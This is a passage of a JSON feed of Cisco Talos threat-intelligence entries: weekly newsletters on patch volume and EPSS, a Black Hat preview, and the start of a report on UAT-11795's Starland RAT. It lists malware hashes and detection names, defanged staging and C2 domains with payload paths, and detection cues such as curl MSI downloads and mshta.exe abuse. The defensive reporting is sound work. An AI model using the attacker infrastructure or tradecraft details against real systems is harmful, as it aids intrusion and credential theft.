(Sept. 14 &#x2013; 17) Denver, CO&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 &#xA0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; Example Filename: VID001.exe&#xA0; Detection Name: Win.Worm.Coinminer::1201&#xA0; SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91&#xA0; MD5: 7bdbd180c081fa63ca94f9c22c457376 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91&#xA0; Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe&#xA0; Detection Name: Win.Dropper.Miner::95.sbx.tg**&#xA0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; MD5: 38de5b216c33833af710e88f7f64fc98&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; Example Filename: SECOH-QAD.exe&#xA0; Detection Name: Win.Tool.Procpatcher::1201&#xA0; SHA256: fc18d4060c6dad3057c0b5a70a2081473e066951720cafbd2aa159d3aaccf2e1&#xA0; MD5: ded73d04bb3e3525226de64c38a332e3&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=fc18d4060c6dad3057c0b5a70a2081473e066951720cafbd2aa159d3aaccf2e1&#xA0; Example Filename: f_000177.exe&#xA0; Detection Name: W32.Trojan.29jq.1201&#xA0; SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0; MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0; Example Filename:tmp00055df5.dll&#xA0; Detection Name: Auto.90B145.282358.in02&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":[],"titleFingerprint":"climb-miley-onto-something","countryCodes":["US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/you-were-onto-something-with-its-the-climb-miley/","type":"report","title":"Cisco Talos: You were onto something with “It’s the Climb,” Miley"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-07-30T18:00:35.000Z","addedAt":"2026-07-30T18:36:47.865Z","updatedAt":"2026-07-30T18:36:47.865Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"99beb8f3-4c8e-4555-91f8-fc653dcb96a7","slug":"talos-don-t-swing-at-everything-11a524c6","externalId":"6a60ff8a824f5b00012e5201","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Don’t swing at everything","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0; Lately I&apos;ve found myself thinking a lot about the Australian TV series Mr. Inbetween (IMDb 8.7/10) &#x2014; not because I&apos;m a hitman for hire, but because I literally feel in-between. Specifically, in-between what I&apos;d call the \"pre-Mythos\" and &#x201C;post-Mythos&#x201D; eras. We&apos;ve crossed a capability threshold, and it&apos;s not just one model family driving that &#x2014; Codex 5.3 and GPT-5.5 deliver comparable or better performance, and Tulongfeng or GLM-5.2 (an incredibly powerful open-weight model, MIT-licensed) show the frontier isn&apos;t limited to closed models anymore.&#xA0; On the other side of that line, real-world impact hasn&apos;t caught up yet and we&apos;re living in an artificial buffer zone. For me, defining the &#x201C;pre-&#x201D; and &#x201C;post-&#x201D; status comes down to the gap between \"vulnerability discovery\" and \"vulnerability publication.\"&#xA0; Last week&#x2019;s Patch Tuesday gave a signal of change, as Joe pointed out, so maybe the buffer zone has come to an end.&#xA0; Let&apos;s dive into the 2026 Q2 stats. As in past years, we&apos;re seeing a steeper curve than the year before &#x2014; a solid 49% YoY growth, though still not the hockey-stick moment I keep waiting for. By the end of June we were tracking close to 200 CVEs per day.&#xA0; Using the keyword methodology described here, I found 452 AI-related CVEs this calendar year. If \"openclaw\" is added to the keyword list, that number jumps by another 536 &#x2014; a reminder that these counts are sensitive to keyword drift. Given how much the keyword list keeps changing, I&apos;m reconsidering whether to keep publishing this particular metric going forward. KEVs, by contrast, \"only\" grew 13% &#x2014; a small April spike aside, it&apos;s fairly flat relative to total CVE growth. Networking-gear-related CVEs continued their climb, now accounting for 24% of KEV-related vulnerabilities (up from 20% in Q1) &#x2014; consistent with the trend I flagged last quarters. As in previous quarters, CVEs from 2024 or earlier still make up about 24% of everything we&apos;re tracking. More strikingly, even though the standard enterprise patch cycle is described&#xA0; to run 30&#x2013;90 days, 181 days into 2026, 46% of today&apos;s actively-exploited (KEV) CVEs still trace back to 2025 or earlier.&#xA0; Old vulnerabilities don&apos;t retire, new ones keep arriving, and machine-speed vulnerability discovery is going to keep outpacing human-speed patching. Which brings me back &#x2014; once again &#x2014; to EPSS as a tool for prioritizing patching against this dataset. If you patched purely by CVSS 9+, you&apos;d be urgently chasing ~3,700 CVEs &#x2014; but 95% of those sit below 5% EPSS, meaning the real-world odds of exploitation are tiny.&#xA0; Of the 32 CVSS 9+ CVEs with EPSS &#x2265; 50%, 25 are already on CISA&apos;s KEV list. The remaining seven outliers are still high-probability by EPSS but haven&apos;t made KEV yet &#x2014; worth watching.&#xA0; Ray Shoesmith (Mr. Inbetween) once told his therapist, \"You know, if I hit somebody, I generally got a pretty good reason.\"&#xA0; Same principle applies to patching. Don&apos;t swing at everything &#x2014; swing at what you have good reason to believe is coming for you.&#xA0; The one big thing&#xA0;Cisco Talos has discovered \"msaRAT,\" a new Rust-based remote access trojan (RAT) deployed by the Chaos ransomware group. Built on the Tokio asynchronous runtime, it establishes a covert command-and-control (C2) channel by hijacking Chrome or Edge browsers via the Chrome DevTools Protocol (CDP). The infection starts with a deceptive MSI file masquerading as a Windows update that loads the payload directly into memory, paving the way for ransomware deployment.&#xA0; Why do I care?&#xA0;This RAT is a master of evasion, living off the browser to build its C2 infrastructure without ever directly touching the network. By routing traffic through legitimate browser processes and trusted services, msaRAT easily bypasses traditional network-based detections. Additionally, its use of the Tokio runtime enables highly efficient, parallel execution of malicious tasks, accelerating the attacker&apos;s ability to establish persistence and deploy double-extortion ransomware.&#xA0; So now what?&#xA0;Defenders should monitor for unusual&#xA0;curl&#xA0;commands, especially those downloading MSI files to the&#xA0;ProgramData&#xA0;directory or sending plain HTTP traffic over port 443. Scrutinize unexpected MSI files impersonating Windows updates and watch for unauthorized Chrome or Edge manipulation. Finally, implement behavioral monitoring to catch Chrome DevTools Protocol abuse and unauthorized WebRTC connections. Read the full blog for complete coverage and indicators of compromise (IOCs).&#xA0; Top security headlines of the week&#xA0;Introducing Antares: Highly efficient open weight AI models for vulnerability localization&#xA0; This week, Cisco introduced Antares, a family of security small language models (SLMs) purpose-built for pinpointing where known vulnerabilities exist within a codebase. (Cisco)&#xA0; Hacker wipes European country&#x2019;s entire land registry database, paralyzing real-estate market&#xA0; A hacker wiped Romania&#x2019;s entire land registry database after an unsuccessful extortion attempt. The attack halted all property transactions, preventing notaries from authenticating sales or registering mortgages nationwide. (Cybernews)&#xA0; \"WP2Shell&#x201D; opens millions of WordPress sites to remote takeover&#xA0; Barely three days after disclosure, attackers are widely chaining together CVE-2026-60137 and CVE-2026-63030 to lob exploit attempts against one of the largest attack surfaces on the Internet. (DarkReading)&#xA0; Progress tells ShareFile customers to shut down Storage Zone Controllers over security threat &#xA0; Only the Storage Zone Controller is affected, not standard cloud-only ShareFile accounts. The controller is a server that a company runs itself, so files can stay on its own storage while it still uses ShareFile&apos;s cloud to share and manage them.&#xA0;(The Hacker News)&#xA0; Microsoft SharePoint under attack via new exploit&#xA0; Researchers warned that patching is not enough to address the deserialization flaw and that security teams &#x201C;should rotate credentials on any assets that may have been exposed.&#x201D;&#xA0;(Cybersecurity Dive)&#xA0; Can&#x2019;t get enough Talos?&#xA0;[Video] Where protection starts: Cisco Talos Intelligence Integrations&#xA0; Every day, defenders make high-consequence decisions with incomplete information. Learn how Cisco Talos Intelligence Integrations help reduce uncertainty by turning the latest threat intelligence into proactive protections across Cisco technologies.&#xA0; The Hunter&apos;s Paradox: Is it time to embrace automated threat hunting?&#xA0; Humans can no longer keep up with the volume and velocity of security data on their own, but AI can&apos;t be fully trusted. David discusses the merits of both and what the future might look like.&#xA0; The serpent&#x2019;s tongue: Luring the Python out of its den&#xA0; Protect your development environment from rising Python supply-chain threats by understanding the package installation lifecycle and implementing these essential defensive strategies.&#xA0; Keeping up with the cybercriminals&#xA0; In this episode of&#xA0;Beers with Talos, Hazel, Bill, Dave and Joe are joined by Kendall McKay to dive into the soap opera of modern cybercrime. Turns out, every ransomware operation is one passive-aggressive group chat message away from falling apart.&#xA0; Upcoming events where you can find Talos&#xA0;Black Hat USA (Aug. 1 &#x2013; 6) Las Vegas, NV&#xA0;DEF CON 34 (Aug. 6 &#x2013; 9) Las Vegas, NV&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 &#xA0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 &#xA0; Example Filename: VID001.exe &#xA0; Detection Name: Win.Worm.Coinminer::1201**&#xA0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f &#xA0; MD5: 38de5b216c33833af710e88f7f64fc98 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f &#xA0; Example Filename: SECOH-QAD.exe &#xA0; Detection Name: Win.Tool.Procpatcher::1201&#xA0; SHA256: e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba &#xA0; MD5: dbd8dbecaa80795c135137d69921fdba &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba &#xA0; Example Filename: u165714.dat &#xA0; Detection Name: W32.Variant:MalwareXgenMisc.29d4.1201&#xA0; SHA256: 633bd79d1efd3730234d907a2a0d98e3e253a5f0e222e4e4bf3badb3fd6aea0a &#xA0; MD5: 770dbe473180366d7b539ff2c188e551 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=633bd79d1efd3730234d907a2a0d98e3e253a5f0e222e4e4bf3badb3fd6aea0a &#xA0; Example Filename: server_tcp.exe &#xA0; Detection Name: W32.Trojan.27oc.1201&#xA0; SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0; MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 &#xA0; Example Filename: tmp00055df5.dll &#xA0; Detection Name: Auto.90B145.282358.in02&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":["CVE-2026-60137","CVE-2026-63030"],"titleFingerprint":null,"countryCodes":["AU","RO","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/dont-swing-at-everything/","type":"report","title":"Cisco Talos: Don’t swing at everything"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-07-23T18:00:46.000Z","addedAt":"2026-07-29T20:53:06.588Z","updatedAt":"2026-07-29T20:53:06.588Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"50359d12-7690-4da3-a793-eb4bb3f435d7","slug":"talos-preview-cisco-talos-at-black-hat-usa-2026-958083d2","externalId":"6a5f858b70c7080001d752bc","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Preview: Cisco Talos at Black Hat USA 2026","description":"We&#x2019;re looking forward to having some great conversations with those of you heading to the desert for Hacker Summer Camp 2026. We have a presence within the Cisco and Splunk booth (2633) during Black Hat where you can chat to us about our latest threat research, incident response, and how Talos powers the Cisco portfolio with our intelligence. Or, feel free to pretend to want to talk to us about those things while grabbing a new multicolored Snorty. That&#x2019;s fine, too. Here&#x2019;s some of the ways we&#x2019;ll be showing up at Black Hat, alongside our friends at Cisco and Splunk:&#xA0; Meet the researchers: Booth lightning talks&#xA0;Our Talosians have spent a lot of time over the last few months putting together some truly... well, enlightening lightning talks. Throughout Wednesday and Thursday at Black Hat, you can expect to see such topics as: Threat actor prompting and the emerging ways adversaries are using prompts, agents, skills, and tools to improve efficiencyWarlock ransomware, and why this group does not fit neatly into a simple RaaS or state-linked label.Zero trust for agent identityBuilding a \"second brain\" for your second brainPredicting cybersecurity fraudVulnerability discovery trends... and much moreLightning talks are 15 minutes. That&#x2019;s less than 9% of The Odyssey. Don&#x2019;t worry,&#xA0;we cut the bit where everyone gets turned into Snorty pigs. Main Stage keynote: Security at agentic scaleDate/Time:&#xA0;Wednesday, August 5 | 11:30&#xA0;a.m. &#x2013; 12:00 p.m. (Main Stage, Business Hall) Cisco&apos;s David Dalling and Rick Miles will be giving a&#xA0;Main Stage keynote&#xA0;all about protecting the enterprise in the age of AI agents. As AI agents become increasingly capable (and increasingly privileged) inside enterprise environments, organizations face an entirely new set of security challenges. Drawing on research from across Cisco, the talk will explore what it takes to secure organizations as autonomous systems become part of everyday business operations. Talos workshop:&#xA0;When AI finds vulnerabilities faster than humans can patch&#xA0;Date/Time:&#xA0;Wednesday, August 5 | 1:30&#xA0;p.m. &#x2013; 3:00 p.m. (Oceanside E, Level 2) If you&apos;re looking for something hands-on and interactive, don&apos;t miss our&#xA0;workshop with Talos&#x2019; Nick Biasini and Cisco&#x2019;s Omar Santos. In two parts, they&#x2019;ll demonstrate practical ways security teams can incorporate AI into SOC workflows to identify sophisticated adversary behavior. In Part 1, Omar will discuss&#xA0;the&#xA0;Foundry Security Spec. He&#x2019;ll walk through how to deploy, build testing harnesses around its core agent roles, and integrate Project&#xA0;CodeGuard&#xA0;so that findings from autonomous testing can be converted into reusable secure-coding rules and future prevention.&#xA0; In Part 2, Nick will&#xA0;demonstrate&#xA0;how Talos leverages AI to transform threat hunting. We will explore best practices for&#xA0;identifying adversarial AI tactics and provide attendees with&#xA0;insights into how Cisco Talos is&#xA0;leveraging&#xA0;AI for&#xA0;defense. Participants will learn how to integrate these defensive AI strategies into their own SOC workflows.&#xA0;&#xA0; Splunk workshop: When agents become insider threats&#xA0;Date/Time:&#xA0;Wednesday, August 5 | 10:15&#xA0;a.m. &#x2013; 11:00 a.m. (Mandalay Bay I) The&#xA0;Splunk workshop&#xA0;considers&#xA0;the fact that&#xA0;the next&#xA0;insider&#xA0;threat may not be a person; it may be an autonomous agent using valid credentials and delegated authority.&#xA0; Attendees will see real-world attack paths in which agents move sensitive data across tools, distribute brute-force attempts under a single delegation, and manipulate internal systems without triggering traditional SIEM or UEBA alerts.&#xA0; It was Talos all alongOne of the questions we hear often is: \"How do I buy Talos?\" The answer&#x2026; is that you probably already did. Throughout the Cisco booth you&apos;ll see our &#x201C;It was Talos all along&#x201D;&#xA0;campaign, highlighting the fact that Talos isn&apos;t a standalone product or a threat intelligence feed you bolt onto your security stack. Talos is already embedded across the Cisco security portfolio, which continually benefits from our threat research and intelligence. To build your curiosity, take a look at our new video, &#x201C;Where Protection Starts,&#x201D; to see how&#xA0;Cisco Talos Intelligence Integrations help reduce uncertainty in the SOC: See you in Las Vegas.","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","geo:inferred"],"relatedCves":[],"titleFingerprint":"2026-black-cisco-hat-preview-talos-usa","countryCodes":["US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/preview-cisco-talos-at-black-hat-usa-2026/","type":"report","title":"Cisco Talos: Preview: Cisco Talos at Black Hat USA 2026"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-07-23T10:00:14.000Z","addedAt":"2026-07-29T20:53:06.616Z","updatedAt":"2026-07-29T20:53:06.616Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"e90ae0eb-3fbc-4e26-b284-2ed0f263769e","slug":"talos-begun-the-patch-wars-have-98721cd9","externalId":"6a58c99722de2d00010884e0","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Begun, the Patch Wars have","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0; We all knew, to some degree or another, that this summer was going to a hot mess. I don&#x2019;t mean FIFA drama or record setting heat waves. I mean the slow but steady momentum that AI frontier models were accruing for vulnerability research. If you were like me, and guesstimating exactly when that shoe would drop, my money was on the middle of summer. And... well, friends, I hate to say it, but I was right.&#xA0;&#xA0; This July&#x2019;s Patch Tuesday is an absolute whopper. There are 622 vulnerabilities being patched, with 62 being a critical severity. To put this context, this month alone has more vulnerabilities listed than all of 2018 combined. Three are zero days, two of which are being actively exploited. July is usually a quiet month historically &#x2013; two years ago, it was just five patches issued in total! These are wild times, friends.&#xA0;&#xA0; Microsoft has said this is due their AI frontier-accelerated research. We knew that this was coming, but what I am less sure about are companies that can meet the demand of this patch flood and getting these patches out to their infrastructures. The pessimist in me knows how most IT enterprises operate: You test, review stability, and then deploy. There&#x2019;s a lag there &#x2013; always has been, always will be. But that system worked under a sane patching load. As surely as much as Microsoft is using frontier models to research and announce vulnerabilities, so every is every other vendor.&#xA0;&#xA0; Either through bug bounty programs or their own internal research, vendors are eating these bugs from a fire hose. Some are straight-up slop and just noise, but some have absolute value and need to be fixed. A giant like Microsoft has the money and resources to address this &#x2013; as well they should. But for every Microsoft, there are five other companies who don&#x2019;t have those resources. They&#x2019;ll get bugs analyzed and patches issued, surely, but it will be on a much longer timeline.&#xA0;&#xA0; The trick, I think, will be identifying what is a &#x201C;surge&#x201D; vs. our new normal. If everything is a fire drill to patch, then nothing is a fire drill. What might just be a hot summer for patching, might turn into a 12-month fusillade of KEV and EPSS notifications, with companies already under the gun taxed even more.&#xA0; I truly don&#x2019;t know how this ends, but&#x2026; Find your change management and IT administrators and give them a hug. There are going to be some long days and hard questions to answer, and they&#x2019;ll need all the help they can get.&#xA0; The one big thing&#xA0;Cisco Talos is disclosing a new campaign by UAT-11795, a sophisticated, financially motivated Russian-speaking adversary targeting users in the U.S. and Europe since at least June 2025. UAT-11795 uses trojanized software installers &#x2014; including popular tools like Webex, Zoom, and MobaXterm &#x2014; to deliver a custom Python-based remote access tool we track as \"Starland RAT.\" This RAT acts as a gateway to deploy further malicious payloads, most notably a bespoke, in-memory PowerShell command-and-control (C2) implant known as the \"WLDR agent.\"&#xA0; Why do I care?&#xA0;This opportunistic campaign casts a wide net across multiple victim profiles, turning a simple software download into a full-blown compromise. UAT-11795 employs highly evasive techniques, including AMSI and ETW bypasses, and uses a clever blockchain-anchored fallback mechanism to maintain persistent command and control. Once inside, attackers rapidly deploy secondary payloads like CastleStealer and Remcos RAT to siphon high-value credentials and cryptocurrency assets.&#xA0; So now what?&#xA0;Educate your users on ClickFix social engineering tactics and the dangers of unofficial software downloads. Monitor for suspicious execution of mshta.exe and unusual PowerShell activity, particularly scripts executing from memory or creating unexpected scheduled tasks. Ensure endpoint detection solutions are tuned to catch in-memory execution and AMSI tampering. Read the full blog for coverage and indicators of compromise (IOCs).&#xA0; Top security headlines of the week&#xA0;Microsoft patches record 622 flaws, including two zero-days under active attack&#xA0; Microsoft shipped its largest Patch Tuesday on record, more than triple June&apos;s previous high of around 200. (The Hacker News)&#xA0; RabbitMQ vulnerability threatens enterprise systems&#xA0; RabbitMQ is a popular open-source message broker that routes, buffers, and distributes messages, enabling asynchronous communication between applications. The security defect impacts an open management endpoint that returns the OAuth secret to anyone, without authentication. (SecurityWeek)&#xA0; Nigeria deepens cybersecurity efforts as cybercriminals see more profits&#xA0; The West African country advanced rules to force organizations to disclose cyberattacks, joining other nations in a shift to mandated transparency. (DarkReading)&#xA0; Two-click cursor exploit enables dev environment takeover&#xA0; Cursor AI, a popular AI coding tool used by more than 50,000 enterprises and 64% of the Fortune 500, can be exploited in just two clicks, allowing attackers to install permission-rich model context protocol (MCP) servers on privileged developers&apos; machines. (DarkReading)&#xA0; Can&#x2019;t get enough Talos?&#xA0;[Video] Where protection starts: Cisco Talos Intelligence Integrations&#xA0; Every day, defenders make high-consequence decisions with incomplete information. Learn how Cisco Talos Intelligence Integrations help reduce uncertainty by turning the latest threat intelligence into proactive protections across Cisco technologies.&#xA0; The Hunter&apos;s Paradox: Is it time to embrace automated threat hunting? Humans can no longer keep up with the volume and velocity of security data on their own, but AI can&apos;t be fully trusted. David discusses the merits of both and what the future might look like. The serpent&#x2019;s tongue: Luring the Python out of its den&#xA0; Protect your development environment from rising Python supply-chain threats by understanding the package installation lifecycle and implementing these essential defensive strategies.&#xA0; ARToken: How attackers are bypassing MFA and maintaining access&#xA0; In this episode of Talos Takes, we dive deep into ARToken, a sophisticated phishing-as-a-service platform that steals credentials, bypasses MFA entirely, and leverages primary refresh tokens (PRTs) to maintain persistence in your environment long after a password reset.&#xA0; Upcoming events where you can find Talos&#xA0;Black Hat USA (Aug. 1 &#x2013; 6) Las Vegas, NV&#xA0;DEF CON 34 (Aug. 6 &#x2013; 9) Las Vegas, NV&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; Example Filename: VID001.exe &#xA0; Detection Name: Win.Worm.Coinminer::1201**&#xA0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; MD5: 38de5b216c33833af710e88f7f64fc98&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; Example Filename: SECOH-QAD.exe&#xA0; Detection Name: Win.Tool.Procpatcher::1201&#xA0; SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 &#xA0; MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0; Example Filename: tmp00055df5.dll &#xA0; Detection Name: Auto.90B145.282358.in02&#xA0; SHA256: b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a&#xA0; MD5: 0398df5a18f71efcfeef4571a2cef577&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a&#xA0; Example Filename: b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a.js&#xA0; Detection Name: W32.B8BE9A5E0A-95.SBX.TG&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":["NG","RU","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/begun-the-patch-wars-have/","type":"report","title":"Cisco Talos: Begun, the Patch Wars have"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-07-16T18:00:50.000Z","addedAt":"2026-07-29T20:53:06.625Z","updatedAt":"2026-07-29T20:53:06.625Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"c4ee77a3-7952-4ca9-8ac2-c5afd720bd53","slug":"talos-uat-11795-deploys-novel-starland-rat-and-bespoke-wldr-c2-c08de417","externalId":"6a511e0b501b2f00010617e7","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign","description":"Cisco Talos is disclosing UAT-11795, a sophisticated, Russian-speaking, financially motivated adversary that has been conducting a malicious campaign targeting users in the U.S. and Europe since at least&#xA0;June&#xA0;2025.&#xA0;&#xA0;Talos has discovered that the actor in this campaign delivers a Python-based&#xA0;remote&#xA0;access&#xA0;tool (RAT) that we track as &#x201C;Starland RAT&#x201D;&#xA0;and a&#xA0;command-and-control (C2)&#xA0;memory implant known as the &#x201C;WLDR agent.&#x201D;&#xA0;The WLDR agent is a sophisticated PowerShell-based C2 memory implant that features encrypted beaconing, task queuing, and a&#xA0;Runspace&#xA0;execution engine for executing&#xA0;additional&#xA0;payloads.&#xA0;&#xA0;UAT-11795 also&#xA0;has&#xA0;CastleStealer&#xA0;and&#xA0;Remcos&#xA0;RAT as alternative payload implants in their arsenal.&#xA0;The actor targets victims&apos; credentials and cryptocurrency wallet assets,&#xA0;establishing&#xA0;a persistent connection to the victims&apos; machines from the C2&#xA0;server, with the potential to deliver and execute further payloads.&#xA0;Victimology&#xA0;According to the telemetry data, the infection is&#xA0;predominantly observed&#xA0;in the United States.&#xA0;There are also&#xA0;fewer potential impacts&#xA0;observed&#xA0;in Germany, Romania, and Venezuela,&#xA0;based on&#xA0;the&#xA0;assessment of the&#xA0;passive DNS resolution data of the C2 domains associated with this campaign.&#xA0; Figure 1.&#xA0;Victimology map of this campaign.Talos has&#xA0;observed&#xA0;that the threat actor in this campaign has utilized&#xA0;trojanized&#xA0;installer lures from software categories including:&#xA0; Trojanized&#xA0;installer&#xA0;&#xA0; Software name&#xA0; Software category&#xA0; MobaXterm_v26.1.exe&#xA0; MobaXterm&#xA0; SSH, remote desktop, and network administration terminal&#xA0; WebEx_Client.exe and Zoom installer&#xA0; Cisco&#xA0;WebEx&#xA0;and Zoom&#xA0; enterprise video conferencing and collaboration platforms&#xA0; dbeaver-ce-windows-x86_64.exe&#xA0; DBeaverCommunity Edition&#xA0; open-source database management and SQL client&#xA0; FaceitInstaller_x64.exe&#xA0; FACEIT&#xA0; online gaming platform&#xA0; The breadth of&#xA0;trojanized&#xA0;software across developer tooling, IT administration utilities, enterprise collaboration platforms, and a consumer gaming application suggests the actor is&#xA0;operating&#xA0;an opportunistic, volume-driven distribution model targeting multiple victim profiles simultaneously,&#xA0;rather than a single vertical.&#xA0; Threat actor&#xA0;infrastructure&#xA0;Figure&#xA0;2.&#xA0;Cisco Umbrella domain resolution statistics for the malicious domains during the research window.The threat actor in this campaign&#xA0;operates&#xA0;a distributed infrastructure across two functional categories, payload staging and persistent&#xA0;C2,&#xA0;with domain naming conventions chosen to blend into legitimate traffic categories.&#xA0;The staging domains,&#xA0;including&#xA0;&#x201C;eorthopaedics[.]com&#x201D;&#xA0;(likely a&#xA0;hijacked domain),&#xA0;&#x201C;web-devtools[.]com&#x201D;&#xA0;(resembles&#xA0;a developer tooling portal),&#xA0;and &#x201C;zynaris[.]io&#x201D;&#xA0;(resembles a&#xA0;technology start-up),&#xA0;with each domain serving a narrow functional role:&#xA0;&#xA0; &#x201C;eorthopaedics[.]com&#x201D;&#xA0;and &#x201C;sastoro[.]com&#x201D;&#xA0;hosts the PowerShell stage chain under&#xA0;&#x201C;/feed/&#x201D;&#xA0;and &#x201C;/alpha/&#x201D; paths&#xA0;indicating&#xA0;that&#xA0;the actor&#xA0;has added the malicious routing alongside the legitimate contents.&#xA0;&#x201C;web-devtools[.]com&#x201D;&#xA0;serves raw shellcode payloads under the paths (&#x201C;/starlandfox&#x201D;,&#xA0;&#x201C;/x32remka&#x201D;,&#xA0;&#x201C;/dopfile&#x201D;) and a compressed archive.&#xA0;&#x201C;zynaris[.]io&#x201D;&#xA0;hosts the potential&#xA0;ClickFix-delivered&#xA0;HTML application (HTA)&#xA0;stager and&#xA0;trojanised&#xA0;installer lures.&#xA0;The C2 infrastructure is similarly distributed, with&#xA0;&#x201C;eorthopaedics[.]com&#x201D;&#xA0;and&#xA0;&#x201C;sastoro[.]com&#x201D;&#xA0;both serving&#xA0;hardware-bound unique identifier&#xA0;(HWID)&#xA0;encrypted envelopes over HWID parameterized URL paths with&#xA0;&#x201C;eorthopaedics[.]com&#x201D;&#xA0;under&#xA0;&#x201C;/feed/&#x201D;&#xA0;and&#xA0;&#x201C;sastoro[.]com&#x201D;&#xA0;under&#xA0;&#x201C;/alpha/&#x201D;.&#xA0;This&#xA0;suggests that&#xA0;the two 